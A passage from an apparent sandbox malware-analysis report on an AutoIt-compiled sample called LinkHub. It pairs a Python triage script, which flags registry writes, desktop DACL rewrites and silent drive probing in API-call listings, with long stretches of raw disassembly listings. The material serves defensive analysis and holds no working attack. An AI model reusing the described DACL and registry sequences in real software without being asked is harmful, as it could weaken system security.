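      • Part of subcall function 00CD1A45: AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CD17E2
and applies three capability rules. "?" marks an argument the sandbox could
not resolve; such arguments are never decoded.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Documented Windows constants (winnt.h / winuser.h / winbase.h).
REG_TYPES = {0: "REG_NONE", 1: "REG_SZ", 2: "REG_EXPAND_SZ", 3: "REG_BINARY",
             4: "REG_DWORD", 7: "REG_MULTI_SZ", 11: "REG_QWORD"}
DACL_SECURITY_INFORMATION = 0x4
SEM_FAILCRITICALERRORS = 0x1


@dataclass
class Call:
    api: str
    module: str
    args: List[str]          # raw tokens exactly as printed; "?" = unresolved
    ref: str                 # address of the call site
    subcall: Optional[str]   # callee address for "Part of subcall function" lines


def parse_calls(text: str) -> List[Call]:
    """Turn one function's API listing into Call records; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("mod").upper(), args,
                          m.group("ref").upper(), m.group("sub")))
    return calls


def arg_int(call: Call, index: int) -> Optional[int]:
    """Argument `index` as an int when the report printed an 8-digit hex literal, else None."""
    if index >= len(call.args):
        return None
    tok = call.args[index]
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None


def triage(calls: List[Call]) -> List[str]:
    """Apply the capability rules to one function and return human-readable findings."""
    names = {c.api for c in calls}
    findings = []

    # Rule 1: every RegSetValueExW, with dwType (4th argument) and cbData (6th) decoded.
    for c in calls:
        if c.api == "RegSetValueExW":
            vtype, size = arg_int(c, 3), arg_int(c, 5)
            findings.append(f"RegSetValueExW @{c.ref}: type={REG_TYPES.get(vtype, vtype)} cbData={size}")

    # Rule 2: read-modify-write of a window station / desktop DACL, the sequence
    # used to let a process started under another account open the interactive
    # window station and desktop. Flagged as a capability, not as proof of use.
    if {"GetUserObjectSecurity", "AddAce", "SetUserObjectSecurity"} <= names:
        setter = next(c for c in calls if c.api == "SetUserObjectSecurity")
        if arg_int(setter, 1) == DACL_SECURITY_INFORMATION:
            findings.append(f"user-object DACL rewritten @{setter.ref} (DACL_SECURITY_INFORMATION)")

    # Rule 3: drives probed with SEM_FAILCRITICALERRORS set, so an empty removable
    # drive cannot raise a "no disk" dialog that would stall the process.
    if "GetDriveTypeW" in names and any(
            c.api == "SetErrorMode" and arg_int(c, 0) == SEM_FAILCRITICALERRORS for c in calls):
        findings.append("drive enumeration under SEM_FAILCRITICALERRORS")
    return findings


# Sample input: lines copied from the listings in this report.
REGWRITE_LISTING = """\
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CFCF1D
• RegCreateKeyExW.ADVAPI32(?,?,00000000,00D0DCD0,00000000,?,00000000,?,?), ref: 00CFCFA4
• RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00CFD004
• _wcslen.LIBCMT ref: 00CFD054
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00CFD112
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00CFD221
• RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00CFD2AD
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00CFD3C0
"""
DACL_LISTING = """\
  • Part of subcall function 00CD1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00CD1A60
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CD1741
• GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CD1775
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CD17E2
• SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CD1881
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CD1893
"""
DRIVE_LISTING = """\
• SetErrorMode.KERNEL32(00000001), ref: 00CE5532
• GetDriveTypeW.KERNEL32(?,00D0DC30,?,\\\\.\\,00D0DCD0), ref: 00CE560F
• SetErrorMode.KERNEL32(00000000,00D0DC30,?,\\\\.\\,00D0DCD0), ref: 00CE577B
"""

if __name__ == "__main__":
    for name, listing in (("RegWrite", REGWRITE_LISTING), ("DACL", DACL_LISTING), ("DriveType", DRIVE_LISTING)):
        print(name, triage(parse_calls(listing)))
```

On this report the registry routine decodes to REG_SZ, REG_MULTI_SZ, REG_QWORD (8 bytes) and REG_BINARY (0 bytes) writes, which matches the REG_* strings the function carries; in an AutoIt-compiled binary this shape is consistent with the runtime's RegWrite built-in rather than with a single hard-coded persistence key, so the value names have to come from the dynamic registry events elsewhere in the report, not from this listing. The same caution applies to the DACL rule: the sequence is a capability of the embedded runtime, and only a matching process-creation event shows it was used.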
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 00D01462
                                                                    • _wcslen.LIBCMT ref: 00D0149D
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00D014F0
                                                                    • _wcslen.LIBCMT ref: 00D01526
                                                                    • _wcslen.LIBCMT ref: 00D015A2
                                                                    • _wcslen.LIBCMT ref: 00D0161D
                                                                      • Part of subcall function 00C8FD52: _wcslen.LIBCMT ref: 00C8FD5D
                                                                      • Part of subcall function 00CD3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CD3547
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                    • API String ID: 1103490817-4258414348
                                                                    • Opcode ID: e3268151cf51ae9db795df5e9b6a3e0b4adeadc160e9eba29e58f404d6ea9159
                                                                    • Instruction ID: 03653786956b0e349d56351fd84e31499f681ff57f8716935d263416f7601afb
                                                                    • Opcode Fuzzy Hash: e3268151cf51ae9db795df5e9b6a3e0b4adeadc160e9eba29e58f404d6ea9159
                                                                    • Instruction Fuzzy Hash: C6E1A0396043019FC714EF24C450A2AB7E2FF98314F58895DF89A9B3A2DB31ED45DBA1
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharUpper
                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                    • API String ID: 1256254125-909552448
                                                                    • Opcode ID: 8f4165dad8454d0a37df017ba187770ad7f9390372f495c7979dc92f04d65ad0
                                                                    • Instruction ID: 2546247657aace38cef847912a4e1c8453077ec710da3dc65332f686d722a7ac
                                                                    • Opcode Fuzzy Hash: 8f4165dad8454d0a37df017ba187770ad7f9390372f495c7979dc92f04d65ad0
                                                                    • Instruction Fuzzy Hash: 0B71F9B260022E8BCB509F7CC9405BE37A3AF60754F210528FA67D7294EA35DE4593A2
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00D08DB5
                                                                    • _wcslen.LIBCMT ref: 00D08DC9
                                                                    • _wcslen.LIBCMT ref: 00D08DEC
                                                                    • _wcslen.LIBCMT ref: 00D08E0F
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00D08E4D
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00D06691), ref: 00D08EA9
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D08EE2
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00D08F25
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00D08F5C
                                                                    • FreeLibrary.KERNEL32(?), ref: 00D08F68
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00D08F78
                                                                    • DestroyIcon.USER32(?,?,?,?,?,00D06691), ref: 00D08F87
                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00D08FA4
                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00D08FB0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                    • String ID: .dll$.exe$.icl
                                                                    • API String ID: 799131459-1154884017
                                                                    • Opcode ID: f230701c37335ce1ef50862e8d3329d3280c753d02e669bbbc148f161504d686
                                                                    • Instruction ID: 6095328f84d016c8fc37150880adba3f63ae5c357a6799c5d9efb6ac8eb0e8a4
                                                                    • Opcode Fuzzy Hash: f230701c37335ce1ef50862e8d3329d3280c753d02e669bbbc148f161504d686
                                                                    • Instruction Fuzzy Hash: CD61DF71900215BEEB14DF74CC45FBEBBA9AF08B10F108106F959E61D1DBB5AA50EBB0
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(?,?), ref: 00CE493D
                                                                    • _wcslen.LIBCMT ref: 00CE4948
                                                                    • _wcslen.LIBCMT ref: 00CE499F
                                                                    • _wcslen.LIBCMT ref: 00CE49DD
                                                                    • GetDriveTypeW.KERNEL32(?), ref: 00CE4A1B
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CE4A63
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CE4A9E
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CE4ACC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                    • API String ID: 1839972693-4113822522
                                                                    • Opcode ID: 790757092e9850705e4ed0061af6ec85bac7c43cde7f1fa3993ab43aa1656bcc
                                                                    • Instruction ID: 0203397cba9f4893db5f494b104783db6361ef045b22619f61c476055b3e888d
                                                                    • Opcode Fuzzy Hash: 790757092e9850705e4ed0061af6ec85bac7c43cde7f1fa3993ab43aa1656bcc
                                                                    • Instruction Fuzzy Hash: 0071E2725086118FC714EF35C84096BB7E8FF98768F00892DF8A597262EB30DE45DB91
                                                                    APIs
                                                                    • LoadIconW.USER32(00000063), ref: 00CD6395
                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00CD63A7
                                                                    • SetWindowTextW.USER32(?,?), ref: 00CD63BE
                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00CD63D3
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00CD63D9
                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00CD63E9
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00CD63EF
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00CD6410
                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00CD642A
                                                                    • GetWindowRect.USER32(?,?), ref: 00CD6433
                                                                    • _wcslen.LIBCMT ref: 00CD649A
                                                                    • SetWindowTextW.USER32(?,?), ref: 00CD64D6
                                                                    • GetDesktopWindow.USER32 ref: 00CD64DC
                                                                    • GetWindowRect.USER32(00000000), ref: 00CD64E3
                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00CD653A
                                                                    • GetClientRect.USER32(?,?), ref: 00CD6547
                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00CD656C
                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00CD6596
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                    • String ID:
                                                                    • API String ID: 895679908-0
                                                                    • Opcode ID: 1992f9dc7ddf9f158470ff831417f84973297a670d796d3df14d4d1ce5b8293d
                                                                    • Instruction ID: 3df2cc78ba95566534f43573ddc2663947676e0ff64bcf99069a5bf20b04800b
                                                                    • Opcode Fuzzy Hash: 1992f9dc7ddf9f158470ff831417f84973297a670d796d3df14d4d1ce5b8293d
                                                                    • Instruction Fuzzy Hash: 147170319007099FDB20DFA9CE45BAEBBF5FF48704F10051AE696E26A0D775EA44CB60
                                                                    APIs
                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00CF0884
                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00CF088F
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00CF089A
                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00CF08A5
                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00CF08B0
                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 00CF08BB
                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 00CF08C6
                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00CF08D1
                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00CF08DC
                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 00CF08E7
                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00CF08F2
                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00CF08FD
                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 00CF0908
                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00CF0913
                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 00CF091E
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00CF0929
                                                                    • GetCursorInfo.USER32(?), ref: 00CF0939
                                                                    • GetLastError.KERNEL32 ref: 00CF097B
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                    • String ID:
                                                                    • API String ID: 3215588206-0
                                                                    • Opcode ID: cf2d65c2ca9ce4029c2e232e3312e90d4ba191dc15fcf3df65ecf42349b4641f
                                                                    • Instruction ID: 2a213d141b7f6ecea929f04a45c12c2af0bb4e13e96459e1ed9fd0ae1dd54bf9
                                                                    • Opcode Fuzzy Hash: cf2d65c2ca9ce4029c2e232e3312e90d4ba191dc15fcf3df65ecf42349b4641f
                                                                    • Instruction Fuzzy Hash: 144163B0D483196BDB50DFBA8C8986EBFE8FF04754B50452AE11CE7292DA78D901CF91
                                                                    APIs
                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00C90436
                                                                      • Part of subcall function 00C9045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00D4170C,00000FA0,086FFC6B,?,?,?,?,00CB2733,000000FF), ref: 00C9048C
                                                                      • Part of subcall function 00C9045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00CB2733,000000FF), ref: 00C90497
                                                                      • Part of subcall function 00C9045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00CB2733,000000FF), ref: 00C904A8
                                                                      • Part of subcall function 00C9045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00C904BE
                                                                      • Part of subcall function 00C9045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00C904CC
                                                                      • Part of subcall function 00C9045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00C904DA
                                                                      • Part of subcall function 00C9045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C90505
                                                                      • Part of subcall function 00C9045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C90510
                                                                    • ___scrt_fastfail.LIBCMT ref: 00C90457
                                                                      • Part of subcall function 00C90413: __onexit.LIBCMT ref: 00C90419
                                                                    Strings
                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00C90492
                                                                    • kernel32.dll, xrefs: 00C904A3
                                                                    • WakeAllConditionVariable, xrefs: 00C904D2
                                                                    • SleepConditionVariableCS, xrefs: 00C904C4
                                                                    • InitializeConditionVariable, xrefs: 00C904B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                    • API String ID: 66158676-1714406822
                                                                    • Opcode ID: 214be80e63291cd7050571d17d424972dba9175922dea4fe887daa58b1454a18
                                                                    • Instruction ID: aa42ccbd443adca5df9e8d496df113e9fd0739f235c297fad5676af8b38b8587
                                                                    • Opcode Fuzzy Hash: 214be80e63291cd7050571d17d424972dba9175922dea4fe887daa58b1454a18
                                                                    • Instruction Fuzzy Hash: EF210836A40704BFDB106BE4BC0EBA93B99EF05B61F210126F905D3780DFB09D808A75
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                    • API String ID: 176396367-1603158881
                                                                    • Opcode ID: a0694effe6b37225c1e43af93872b91d721502175e5ab6d9b60eda27322ca007
                                                                    • Instruction ID: 0fbe7635ca2ea43224e6f3c0c9211af154ee085dc0bce117831a064a836bc9ec
                                                                    • Opcode Fuzzy Hash: a0694effe6b37225c1e43af93872b91d721502175e5ab6d9b60eda27322ca007
                                                                    • Instruction Fuzzy Hash: 5AE1E532A00556AFCB189FB4C8416EDFBB1BF54710F14811BE666E7390DB309F459BA1
                                                                    APIs
                                                                    • CharLowerBuffW.USER32(00000000,00000000,00D0DCD0), ref: 00CE4F6C
                                                                    • _wcslen.LIBCMT ref: 00CE4F80
                                                                    • _wcslen.LIBCMT ref: 00CE4FDE
                                                                    • _wcslen.LIBCMT ref: 00CE5039
                                                                    • _wcslen.LIBCMT ref: 00CE5084
                                                                    • _wcslen.LIBCMT ref: 00CE50EC
                                                                      • Part of subcall function 00C8FD52: _wcslen.LIBCMT ref: 00C8FD5D
                                                                    • GetDriveTypeW.KERNEL32(?,00D37C10,00000061), ref: 00CE5188
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                    • API String ID: 2055661098-1000479233
                                                                    • Opcode ID: afefae368fec3cfea723766ddad878d8bfe70a3de727806cb0ef6036a97ff0bd
                                                                    • Instruction ID: 9c3dbad1f483fb594bbc613eaa214b74ed08aba7c0218f6c9edfc364414313af
                                                                    • Opcode Fuzzy Hash: afefae368fec3cfea723766ddad878d8bfe70a3de727806cb0ef6036a97ff0bd
                                                                    • Instruction Fuzzy Hash: A5B126316087429FC714DF2AC890A6EB7E5BFA4728F10891DF5AAC7291D730DD45CBA2
                                                                    APIs
                                                                    • _wcslen.LIBCMT ref: 00CFBBF8
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CFBC10
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CFBC34
                                                                    • _wcslen.LIBCMT ref: 00CFBC60
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CFBC74
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CFBC96
                                                                    • _wcslen.LIBCMT ref: 00CFBD92
                                                                      • Part of subcall function 00CE0F4E: GetStdHandle.KERNEL32(000000F6), ref: 00CE0F6D
                                                                    • _wcslen.LIBCMT ref: 00CFBDAB
                                                                    • _wcslen.LIBCMT ref: 00CFBDC6
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CFBE16
                                                                    • GetLastError.KERNEL32(00000000), ref: 00CFBE67
                                                                    • CloseHandle.KERNEL32(?), ref: 00CFBE99
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CFBEAA
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CFBEBC
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CFBECE
                                                                    • CloseHandle.KERNEL32(?), ref: 00CFBF43
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmp
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                    • String ID:
                                                                    • API String ID: 2178637699-0
                                                                    • Opcode ID: 4754d1b9321ec70c994a064d50058da10c7557ee40277759df591ef8a734a793
                                                                    • Instruction ID: f06446bb0172c2ee5505d37dae661f8a243a5666e0d8b41ea0d2f743fd69f4fb
                                                                    • Opcode Fuzzy Hash: 4754d1b9321ec70c994a064d50058da10c7557ee40277759df591ef8a734a793
                                                                    • Instruction Fuzzy Hash: 66F1CE316043449FCB54EF24C895B6EBBE5BF84310F18895DFA998B2A2CB30ED45DB52
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00D0DCD0), ref: 00CF4B18
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00CF4B2A
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00D0DCD0), ref: 00CF4B4F
                                                                    • FreeLibrary.KERNEL32(00000000,?,00D0DCD0), ref: 00CF4B9B
                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,00D0DCD0), ref: 00CF4C05
                                                                    • SysFreeString.OLEAUT32(00000009), ref: 00CF4CBF
                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CF4D25
